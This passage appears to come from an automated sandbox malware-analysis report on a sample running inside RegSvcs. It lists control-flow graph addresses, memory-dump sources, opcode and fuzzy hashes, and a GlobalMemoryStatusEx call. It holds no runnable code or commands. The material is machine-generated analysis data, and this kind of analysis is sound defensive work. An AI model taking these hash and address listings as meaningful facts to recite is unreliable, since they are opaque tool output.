6b05a3f-6b05a42 2437->2445 2477 6b05d05-6b05d18 2438->2477 2478 6b05bd6-6b05bdd 2438->2478 2439->2424 2440->2441 2441->2438 2446 6b05d1b-6b05d1e 2441->2446 2442->2428 2444->2433 2455 6b05a3a 2444->2455 2445->2438 2448 6b05a44-6b05a47 2445->2448 2449 6b05d20-6b05d25 2446->2449 2450 6b05d28-6b05d2a 2446->2450 2448->2433 2448->2435 2449->2450 2452 6b05d31-6b05d34 2450->2452 2453 6b05d2c 2450->2453 2452->2413 2456 6b05d3a-6b05d43 2452->2456 2453->2452 2455->2445 2479 6b05c90-6b05c97 2478->2479 2480 6b05be3-6b05c15 2478->2480 2479->2477 2481 6b05c99-6b05ccc 2479->2481 2491 6b05c17 2480->2491 2492 6b05c1a-6b05c5b 2480->2492 2493 6b05cd1-6b05cfe 2481->2493 2494 6b05cce 2481->2494 2491->2492 2502 6b05c73-6b05c7a 2492->2502 2503 6b05c5d-6b05c6e 2492->2503 2493->2456 2494->2493 2505 6b05c82-6b05c84 2502->2505 2503->2456 2505->2456
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d1ce74d22c7ce02d288c6905b75e8a32b7db609a4278949a7bb6acf481e22466
                          • Instruction ID: bb5fcc60920e78e5d692e86fd4bac02b691a1413f8f857a2f4327e2d36f0ce98
                          • Opcode Fuzzy Hash: d1ce74d22c7ce02d288c6905b75e8a32b7db609a4278949a7bb6acf481e22466
                          • Instruction Fuzzy Hash: 2D12B6B2F002048FEB74DB64D98076EBFA2EB85310F2494A9D8559B785DB34EC45CF90

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 3177 6b07de0-6b07dfe 3178 6b07e00-6b07e03 3177->3178 3179 6b07e24-6b07e27 3178->3179 3180 6b07e05-6b07e1f 3178->3180 3181 6b07e29-6b07e37 3179->3181 3182 6b07e3e-6b07e41 3179->3182 3180->3179 3189 6b07e86-6b07e9c 3181->3189 3190 6b07e39 3181->3190 3183 6b07e43-6b07e5f 3182->3183 3184 6b07e64-6b07e67 3182->3184 3183->3184 3187 6b07e74-6b07e76 3184->3187 3188 6b07e69-6b07e73 3184->3188 3192 6b07e78 3187->3192 3193 6b07e7d-6b07e80 3187->3193 3197 6b07ea2-6b07eab 3189->3197 3198 6b080b7-6b080c1 3189->3198 3190->3182 3192->3193 3193->3178 3193->3189 3199 6b07eb1-6b07ece 3197->3199 3200 6b080c2-6b080d4 3197->3200 3207 6b080a4-6b080b1 3199->3207 3208 6b07ed4-6b07efc 3199->3208 3203 6b080e0-6b080f7 3200->3203 3204 6b080d6-6b080de 3200->3204 3206 6b080f9-6b080fc 3203->3206 3204->3203 3209 6b080fe-6b0811a 3206->3209 3210 6b0811f-6b08122 3206->3210 3207->3197 3207->3198 3208->3207 3232 6b07f02-6b07f0b 3208->3232 3209->3210 3211 6b08128-6b08134 3210->3211 3212 6b081cf-6b081d2 3210->3212 3217 6b0813f-6b08141 3211->3217 3213 6b08407-6b08409 3212->3213 3214 6b081d8-6b081e7 3212->3214 3218 6b08410-6b08413 3213->3218 3219 6b0840b 3213->3219 3230 6b08206-6b0824a 3214->3230 3231 6b081e9-6b08204 3214->3231 3220 6b08143-6b08149 3217->3220 3221 6b08159-6b0815d 3217->3221 3218->3206 3222 6b08419-6b08422 3218->3222 3219->3218 3226 6b0814b 3220->3226 3227 6b0814d-6b0814f 3220->3227 3228 6b0816b 3221->3228 3229 6b0815f-6b08169 3221->3229 3226->3221 3227->3221 3233 6b08170-6b08172 3228->3233 3229->3233 3239 6b08250-6b08261 3230->3239 3240 6b083db-6b083f1 3230->3240 3231->3230 3232->3200 3234 6b07f11-6b07f2d 3232->3234 3236 6b08174-6b08177 3233->3236 3237 6b08189-6b081c2 3233->3237 3245 6b08092-6b0809e 3234->3245 3246 6b07f33-6b07f5d 3234->3246 3236->3222 3237->3214 3260 6b081c4-6b081ce 3237->3260 3250 6b083c6-6b083d5 3239->3250 3251 6b08267-6b08284 3239->3251 3240->3213 3245->3207 3245->3232 3261 6b07f63-6b07f8b 3246->3261 3262 6b08088-6b0808d 3246->3262 3250->3239 3250->3240 3251->3250 3263 6b0828a-6b08380 call 6b06608 3251->3263 3261->3262 3269 6b07f91-6b07fbf 3261->3269 3262->3245 3312 6b08382-6b0838c 3263->3312 3313 6b0838e 3263->3313 3269->3262 3274 6b07fc5-6b07fce 3269->3274 3274->3262 3276 6b07fd4-6b08006 3274->3276 3283 6b08011-6b0802d 3276->3283 3284 6b08008-6b0800c 3276->3284 3283->3245 3287 6b0802f-6b08086 call 6b06608 3283->3287 3284->3262 3286 6b0800e 3284->3286 3286->3283 3287->3245 3314 6b08393-6b08395 3312->3314 3313->3314 3314->3250 3315 6b08397-6b0839c 3314->3315 3316 6b083aa 3315->3316 3317 6b0839e-6b083a8 3315->3317 3318 6b083af-6b083b1 3316->3318 3317->3318 3318->3250 3319 6b083b3-6b083bf 3318->3319 3319->3250
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a0d78772a6efbfd54bf165072bfa6a46eed6afd7aa2aa04878de32c41645fcbc
                          • Instruction ID: 4ce4d0cca06afd89b057a9d26070da27f638b95a7e3ba18b8df472f397a39e94
                          • Opcode Fuzzy Hash: a0d78772a6efbfd54bf165072bfa6a46eed6afd7aa2aa04878de32c41645fcbc
                          • Instruction Fuzzy Hash: BF028E71B012058FEF54DB69D850AAEBFB2FF88310F1485A9D505AB390EB35ED42CB91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 521 300eb50-300eb6b 522 300eb95-300ebab 521->522 523 300eb6d-300eb94 521->523 543 300ebad call 300eb50 522->543 544 300ebad call 300ec38 522->544 526 300ebb2-300ebb4 527 300ebb6-300ebb9 526->527 528 300ebba-300ec19 526->528 535 300ec1b-300ec1e 528->535 536 300ec1f-300ecac GlobalMemoryStatusEx 528->536 539 300ecb5-300ecdd 536->539 540 300ecae-300ecb4 536->540 540->539 543->526 544->526
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2662516844.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_3000000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f8ac8feb540eaef67d49c0dcb27a212a751845b8d3e25d14693bc78e235f9f39
                          • Instruction ID: de90afd83155bc3f29e5998e2290151e7f8315a77884b6e464fbaa391c1c8460
                          • Opcode Fuzzy Hash: f8ac8feb540eaef67d49c0dcb27a212a751845b8d3e25d14693bc78e235f9f39
                          • Instruction Fuzzy Hash: B3412772D143498FD714CF79D4047AABFF1AF89210F1985ABD444A7391D7389845CBA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 545 300ec38-300ecac GlobalMemoryStatusEx 547 300ecb5-300ecdd 545->547 548 300ecae-300ecb4 545->548 548->547
                          APIs
                          • GlobalMemoryStatusEx.KERNELBASE ref: 0300EC9F
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2662516844.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_3000000_RegSvcs.jbxd
                          Similarity
                          • API ID: GlobalMemoryStatus
                          • String ID:
                          • API String ID: 1890195054-0
                          • Opcode ID: 7b53043523b3f8c37b442a379ec1868338039080b6d311b815daac0db7971a7e
                          • Instruction ID: 1d029f55406ba4d4ea89628ee3fae5899f7a9295c573245d6730283f1f32924f
                          • Opcode Fuzzy Hash: 7b53043523b3f8c37b442a379ec1868338039080b6d311b815daac0db7971a7e
                          • Instruction Fuzzy Hash: 3F1123B1C0065A9BDB10CFAAC444BDEFBF4AF48320F14816AD818B7240D378A944CFA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1371 6b0cfb0-6b0cfcb 1372 6b0cfcd-6b0cfd0 1371->1372 1373 6b0cfd2-6b0cfd4 1372->1373 1374 6b0cfdf-6b0cfe2 1372->1374 1377 6b0d357-6b0d360 1373->1377 1378 6b0cfda 1373->1378 1375 6b0cfe4-6b0cfe9 1374->1375 1376 6b0cfec-6b0cfef 1374->1376 1375->1376 1379 6b0cff1-6b0d000 1376->1379 1380 6b0d038-6b0d03b 1376->1380 1381 6b0d362-6b0d367 1377->1381 1382 6b0d36f-6b0d37b 1377->1382 1378->1374 1383 6b0d002-6b0d007 1379->1383 1384 6b0d00f-6b0d01b 1379->1384 1387 6b0d03d-6b0d059 1380->1387 1388 6b0d05e-6b0d061 1380->1388 1381->1382 1385 6b0d381-6b0d395 1382->1385 1386 6b0d48c-6b0d491 1382->1386 1383->1384 1391 6b0d021-6b0d033 1384->1391 1392 6b0d9cd-6b0da06 1384->1392 1403 6b0d499 1385->1403 1404 6b0d39b-6b0d3ad 1385->1404 1386->1403 1387->1388 1389 6b0d063-6b0d0a5 1388->1389 1390 6b0d0aa-6b0d0ad 1388->1390 1389->1390 1395 6b0d0b3-6b0d0b6 1390->1395 1396 6b0d49c-6b0d4a8 1390->1396 1391->1380 1407 6b0da08-6b0da0b 1392->1407 1405 6b0d0b8-6b0d0fa 1395->1405 1406 6b0d0ff-6b0d102 1395->1406 1401 6b0d2fe-6b0d30d 1396->1401 1402 6b0d4ae-6b0d79b 1396->1402 1410 6b0d31c-6b0d328 1401->1410 1411 6b0d30f-6b0d314 1401->1411 1584 6b0d7a1-6b0d7a7 1402->1584 1585 6b0d9c2-6b0d9cc 1402->1585 1403->1396 1427 6b0d3d1-6b0d3d3 1404->1427 1428 6b0d3af-6b0d3b5 1404->1428 1405->1406 1408 6b0d104-6b0d11a 1406->1408 1409 6b0d11f-6b0d122 1406->1409 1414 6b0da0d-6b0da39 1407->1414 1415 6b0da3e-6b0da41 1407->1415 1408->1409 1419 6b0d124-6b0d166 1409->1419 1420 6b0d16b-6b0d16e 1409->1420 1410->1392 1418 6b0d32e-6b0d340 1410->1418 1411->1410 1414->1415 1425 6b0da43-6b0da5f 1415->1425 1426 6b0da64-6b0da67 1415->1426 1441 6b0d345-6b0d347 1418->1441 1419->1420 1423 6b0d170-6b0d172 1420->1423 1424 6b0d17d-6b0d180 1420->1424 1423->1403 1435 6b0d178 1423->1435 1437 6b0d182-6b0d1c4 1424->1437 1438 6b0d1c9-6b0d1cc 1424->1438 1425->1426 1432 6b0da76-6b0da78 1426->1432 1433 6b0da69 1426->1433 1448 6b0d3dd-6b0d3e9 1427->1448 1439 6b0d3b7 1428->1439 1440 6b0d3b9-6b0d3c5 1428->1440 1442 6b0da7a 1432->1442 1443 6b0da7f-6b0da82 1432->1443 1631 6b0da69 call 6b0db25 1433->1631 1632 6b0da69 call 6b0db38 1433->1632 1435->1424 1437->1438 1444 6b0d215-6b0d218 1438->1444 1445 6b0d1ce-6b0d210 1438->1445 1447 6b0d3c7-6b0d3cf 1439->1447 1440->1447 1451 6b0d349 1441->1451 1452 6b0d34e-6b0d351 1441->1452 1442->1443 1443->1407 1455 6b0da84-6b0da93 1443->1455 1458 6b0d261-6b0d264 1444->1458 1459 6b0d21a-6b0d25c 1444->1459 1445->1444 1447->1448 1477 6b0d3f7 1448->1477 1478 6b0d3eb-6b0d3f5 1448->1478 1451->1452 1452->1372 1452->1377 1454 6b0da6f-6b0da71 1454->1432 1480 6b0da95-6b0daf8 call 6b06608 1455->1480 1481 6b0dafa-6b0db0f 1455->1481 1463 6b0d266-6b0d2a8 1458->1463 1464 6b0d2ad-6b0d2b0 1458->1464 1459->1458 1463->1464 1472 6b0d2b2-6b0d2f4 1464->1472 1473 6b0d2f9-6b0d2fc 1464->1473 1472->1473 1473->1401 1473->1441 1483 6b0d3fc-6b0d3fe 1477->1483 1478->1483 1480->1481 1502 6b0db10 1481->1502 1483->1403 1491 6b0d404-6b0d420 call 6b06608 1483->1491 1512 6b0d422-6b0d427 1491->1512 1513 6b0d42f-6b0d43b 1491->1513 1502->1502 1512->1513 1513->1386 1518 6b0d43d-6b0d48a 1513->1518 1518->1403 1586 6b0d7b6-6b0d7bf 1584->1586 1587 6b0d7a9-6b0d7ae 1584->1587 1586->1392 1588 6b0d7c5-6b0d7d8 1586->1588 1587->1586 1590 6b0d9b2-6b0d9bc 1588->1590 1591 6b0d7de-6b0d7e4 1588->1591 1590->1584 1590->1585 1592 6b0d7f3-6b0d7fc 1591->1592 1593 6b0d7e6-6b0d7eb 1591->1593 1592->1392 1594 6b0d802-6b0d823 1592->1594 1593->1592 1597 6b0d832-6b0d83b 1594->1597 1598 6b0d825-6b0d82a 1594->1598 1597->1392 1599 6b0d841-6b0d85e 1597->1599 1598->1597 1599->1590 1602 6b0d864-6b0d86a 1599->1602 1602->1392 1603 6b0d870-6b0d889 1602->1603 1605 6b0d9a5-6b0d9ac 1603->1605 1606 6b0d88f-6b0d8b6 1603->1606 1605->1590 1605->1602 1606->1392 1609 6b0d8bc-6b0d8c6 1606->1609 1609->1392 1610 6b0d8cc-6b0d8e3 1609->1610 1612 6b0d8f2-6b0d90d 1610->1612 1613 6b0d8e5-6b0d8f0 1610->1613 1612->1605 1618 6b0d913-6b0d92c call 6b06608 1612->1618 1613->1612 1622 6b0d93b-6b0d944 1618->1622 1623 6b0d92e-6b0d933 1618->1623 1622->1392 1624 6b0d94a-6b0d99e 1622->1624 1623->1622 1624->1605 1631->1454 1632->1454
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 677ae1962c90ad234f5f3f7dc8eb29923ead1d4aede81daf38fd7c2a62969b35
                          • Instruction ID: c122e125ab38d83d79eba826bcfddd6924b04325b2f1f0fcf6a40e46736ed94d
                          • Opcode Fuzzy Hash: 677ae1962c90ad234f5f3f7dc8eb29923ead1d4aede81daf38fd7c2a62969b35
                          • Instruction Fuzzy Hash: 60626070A00209CFDB55EFA8D590A5DBBF2FF84300B648AA8D045AF395DB75ED46CB81

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 3321 6b0ad38-6b0ad56 3322 6b0ad58-6b0ad5b 3321->3322 3323 6b0ad61-6b0ad64 3322->3323 3324 6b0af55-6b0af5e 3322->3324 3327 6b0ad66-6b0ad6b 3323->3327 3328 6b0ad6e-6b0ad71 3323->3328 3325 6b0ada3-6b0adac 3324->3325 3326 6b0af64-6b0af6e 3324->3326 3334 6b0adb2-6b0adb6 3325->3334 3335 6b0af6f-6b0af79 3325->3335 3327->3328 3329 6b0ad73-6b0ad86 3328->3329 3330 6b0ad8b-6b0ad8e 3328->3330 3329->3330 3332 6b0ad90-6b0ad99 3330->3332 3333 6b0ad9e-6b0ada1 3330->3333 3332->3333 3333->3325 3337 6b0adbb-6b0adbe 3333->3337 3334->3337 3341 6b0af23 3335->3341 3342 6b0af7b-6b0af7d 3335->3342 3339 6b0adc0-6b0adcd 3337->3339 3340 6b0add2-6b0add5 3337->3340 3339->3340 3343 6b0add7-6b0adf3 3340->3343 3344 6b0adf8-6b0adfb 3340->3344 3347 6b0af27-6b0af4b 3341->3347 3342->3347 3348 6b0af7f-6b0afa6 3342->3348 3343->3344 3345 6b0ae0c-6b0ae0e 3344->3345 3346 6b0adfd-6b0ae01 3344->3346 3352 6b0ae10 3345->3352 3353 6b0ae15-6b0ae18 3345->3353 3346->3326 3351 6b0ae07 3346->3351 3372 6b0af52 3347->3372 3358 6b0afa8-6b0afab 3348->3358 3351->3345 3352->3353 3353->3322 3355 6b0ae1e-6b0ae42 3353->3355 3355->3372 3373 6b0ae48-6b0ae57 3355->3373 3359 6b0afb8-6b0afbb 3358->3359 3360 6b0afad-6b0afb1 3358->3360 3365 6b0afca-6b0afcd 3359->3365 3366 6b0afbd 3359->3366 3363 6b0afd3-6b0b00e 3360->3363 3364 6b0afb3 3360->3364 3376 6b0b201-6b0b214 3363->3376 3377 6b0b014-6b0b020 3363->3377 3364->3359 3365->3363 3369 6b0b236-6b0b239 3365->3369 3449 6b0afbd call 6b0b2a0 3366->3449 3450 6b0afbd call 6b0b292 3366->3450 3374 6b0b23b-6b0b257 3369->3374 3375 6b0b25c-6b0b25f 3369->3375 3371 6b0afc3-6b0afc5 3371->3365 3372->3324 3385 6b0ae59-6b0ae5f 3373->3385 3386 6b0ae6f-6b0aeaa call 6b06608 3373->3386 3374->3375 3378 6b0b261-6b0b26b 3375->3378 3379 6b0b26c-6b0b26e 3375->3379 3382 6b0b216 3376->3382 3393 6b0b040-6b0b084 3377->3393 3394 6b0b022-6b0b03b 3377->3394 3383 6b0b270 3379->3383 3384 6b0b275-6b0b278 3379->3384 3392 6b0b217 3382->3392 3383->3384 3384->3358 3388 6b0b27e-6b0b288 3384->3388 3390 6b0ae61 3385->3390 3391 6b0ae63-6b0ae65 3385->3391 3405 6b0aec2-6b0aed9 3386->3405 3406 6b0aeac-6b0aeb2 3386->3406 3390->3386 3391->3386 3392->3392 3410 6b0b0a0-6b0b0df 3393->3410 3411 6b0b086-6b0b098 3393->3411 3394->3382 3418 6b0aef1-6b0af02 3405->3418 3419 6b0aedb-6b0aee1 3405->3419 3408 6b0aeb4 3406->3408 3409 6b0aeb6-6b0aeb8 3406->3409 3408->3405 3409->3405 3415 6b0b0e5-6b0b1c0 call 6b06608 3410->3415 3416 6b0b1c6-6b0b1db 3410->3416 3411->3410 3415->3416 3416->3376 3427 6b0af04-6b0af0a 3418->3427 3428 6b0af1a-6b0af1c 3418->3428 3423 6b0aee3 3419->3423 3424 6b0aee5-6b0aee7 3419->3424 3423->3418 3424->3418 3430 6b0af0c 3427->3430 3431 6b0af0e-6b0af10 3427->3431 3428->3341 3430->3428 3431->3428 3449->3371 3450->3371
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2e4426c42ebaba77ccfdedd3761a3541b350d61df8a43cd6f2e04d322ccf8ae5
                          • Instruction ID: 8eecea0af1d7d03edcf2215d5f6ae1556525dfc5c1478e131c335fb2d8868952
                          • Opcode Fuzzy Hash: 2e4426c42ebaba77ccfdedd3761a3541b350d61df8a43cd6f2e04d322ccf8ae5
                          • Instruction Fuzzy Hash: DEE14071E103098FEB65DB64D4906AEBFB2EB88300F208969D405EB395DB75DC42CB91
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 721bc04623cb9a25863d8155ae4626b8c31dbf48f87fc471e9985879cc0a19de
                          • Instruction ID: 14a2cf72d318e80ef6f45c06d1bb2c0c19bd5cadd1aaf49ad0177ac073f65618
                          • Opcode Fuzzy Hash: 721bc04623cb9a25863d8155ae4626b8c31dbf48f87fc471e9985879cc0a19de
                          • Instruction Fuzzy Hash: 3EB164B4E001099BFF64DAA8D4907ADBFB6FB49310F209465E505EB3D1CA3ADD418B51
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3d6267cd85270d6d10c08f60fa25985ea82eb5abba5a2153f2356072b3054b71
                          • Instruction ID: edd6f2cff808dcca24350d9e9c273460a6976a9c4a77453b62802e710bd385db
                          • Opcode Fuzzy Hash: 3d6267cd85270d6d10c08f60fa25985ea82eb5abba5a2153f2356072b3054b71
                          • Instruction Fuzzy Hash: 9DA15FB4E102098FEF64CB58C580BADBFB1FB45310F2495A6E459EB391DA36EC81CB51
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8f81853b4c811c18c8225dfc180340e065ad3398d19bd09e5674b20600fd2308
                          • Instruction ID: 20b26a384d7190552250c8557d258b4cd7cd763c9a807ca849d617badfb82d17
                          • Opcode Fuzzy Hash: 8f81853b4c811c18c8225dfc180340e065ad3398d19bd09e5674b20600fd2308
                          • Instruction Fuzzy Hash: 82917271B002098FEB54EF65D8507AEBBF2EF88700F1494A9D409EB385EB789D418B90
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 328facf490953cf0417e610e40cc89d0f07310a7d6266b5cf8201fd4050a3e5e
                          • Instruction ID: 142caf81854de0129e0e165702f70e95b830277c2694a15dc2f903d21ce93072
                          • Opcode Fuzzy Hash: 328facf490953cf0417e610e40cc89d0f07310a7d6266b5cf8201fd4050a3e5e
                          • Instruction Fuzzy Hash: E061C3B1F001114BEB259B6EC95496EBFE7EFC4620B194479D80AEB360EE75EC0287D1
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7dfa246b42c6d6488311057eb852d394c88dfa5b99f83a466ea0dbed82ffcbfc
                          • Instruction ID: 42023d4a84a762da9377be205b58d96a6b2e86b2a49e62bf95e6d3af81a803e8
                          • Opcode Fuzzy Hash: 7dfa246b42c6d6488311057eb852d394c88dfa5b99f83a466ea0dbed82ffcbfc
                          • Instruction Fuzzy Hash: 76814E71B002098BDF54DFA9C5A076EBBF2EB89300F149569D90AEB395EB34DC428B51
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5a6668bcd14efa1a40abbfef62d714ae294dd578beb16a0a013317762cf80666
                          • Instruction ID: 116ee93abe93453bcea616b5905865be867c2f994615d0aafb42b200e60c8285
                          • Opcode Fuzzy Hash: 5a6668bcd14efa1a40abbfef62d714ae294dd578beb16a0a013317762cf80666
                          • Instruction Fuzzy Hash: 32914E74E002198FEF60DF68C850B9DBBB1FF89300F208595D549BB295DB70AA85CF90
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 235f6682b7c17b95301b11f1cad999eea5eca63f905fa4ea8ef9bd4b33922cb4
                          • Instruction ID: 5127cb80d814cc6d6e26edcca4ca9f40523ba6e5680669ef8576b4239ca4a8ed
                          • Opcode Fuzzy Hash: 235f6682b7c17b95301b11f1cad999eea5eca63f905fa4ea8ef9bd4b33922cb4
                          • Instruction Fuzzy Hash: 79813C71B002098BDF54DFA9D5A066EBBF2EB89300F148469D90AEB395EB35DC428B51
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c29cbb9d920d03a5693e08fdde568ca2d3f22c78204dd03fab5038614c7c547f
                          • Instruction ID: cdd6d736b310c7ec30848101d8387a2e3288994769175f793a7eb2260ca35377
                          • Opcode Fuzzy Hash: c29cbb9d920d03a5693e08fdde568ca2d3f22c78204dd03fab5038614c7c547f
                          • Instruction Fuzzy Hash: DE913F74E10219CBEF60DF64C890B9DBBB1FF89310F208595D549BB285DB71A985CF90
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6bcf2ff145c79ae07c0039b7e0f5157988949d90405f4ff6ba18873e9eecddc9
                          • Instruction ID: d83e33eec5418b9d0ab1ca6e13162bf8f9ecd1b5d6ab1386c55d59f1006d79a2
                          • Opcode Fuzzy Hash: 6bcf2ff145c79ae07c0039b7e0f5157988949d90405f4ff6ba18873e9eecddc9
                          • Instruction Fuzzy Hash: 24711CB0B002189FEB54DBA9D990AADBFF6EF88300F148469D415AB394DB34ED46CB50
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 69adfdcaa37ef8cac3bdaa9264cf1485396818cdbd83ab26b55a12ae90c715a6
                          • Instruction ID: 8c7bf7289e2ece506595e955e9e559f7ed0a9b013c565a29524f9c6e13f22ff4
                          • Opcode Fuzzy Hash: 69adfdcaa37ef8cac3bdaa9264cf1485396818cdbd83ab26b55a12ae90c715a6
                          • Instruction Fuzzy Hash: 60712CB0B002099FEB54DBA8D990AADBFF6FF88300F148469D455AB395DB34ED46CB50
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ef3f8e8605047b71848496fe6f6c559bab275bf761c8c1ea127035d107ae94b1
                          • Instruction ID: 2befe23b35a788e29f2acc4b5ab05df5b45b182a99a155e0018776c3e0ad1e41
                          • Opcode Fuzzy Hash: ef3f8e8605047b71848496fe6f6c559bab275bf761c8c1ea127035d107ae94b1
                          • Instruction Fuzzy Hash: D9616C71E102089FEB549BA5C8547AEBFF6EB88710F208469E10AAB394DF755C458F90
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7f237dcda8f88d9c1bae7d730a7a3457c99c864fe401cc22ae9f34dd885a0c97
                          • Instruction ID: 5a926f9b3e2a56ac267d416ed36e71b7cb2f7bc41c6d2c4c8e3143b766c270c9
                          • Opcode Fuzzy Hash: 7f237dcda8f88d9c1bae7d730a7a3457c99c864fe401cc22ae9f34dd885a0c97
                          • Instruction Fuzzy Hash: 6F51DFB1F10209DFEB64EB78E4542BDBFB6FB84311F1089A9E506E7291DB358855CB80
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2671063416.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6b00000_RegSvcs.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ae71cfe98342808fa40d47d44e3162da3a01299fb93d8b52b1b868f7738cbd19
                          • Instruction ID: 9903e7b45c6862c46c078b06c72313bf23072123171f6192d88c06fdb24edbd3
                          • Opcode Fuzzy Hash: ae71cfe98342808fa40d47d44e3162da3a01299fb93d8b52b1b868f7738cbd19
                          • Instruction Fuzzy Hash: 005192B0B102049BFF749A68D954B7E2E6EE789310F20447AE80BD73D1C97DCC5187A2
                          Memory Dump Source
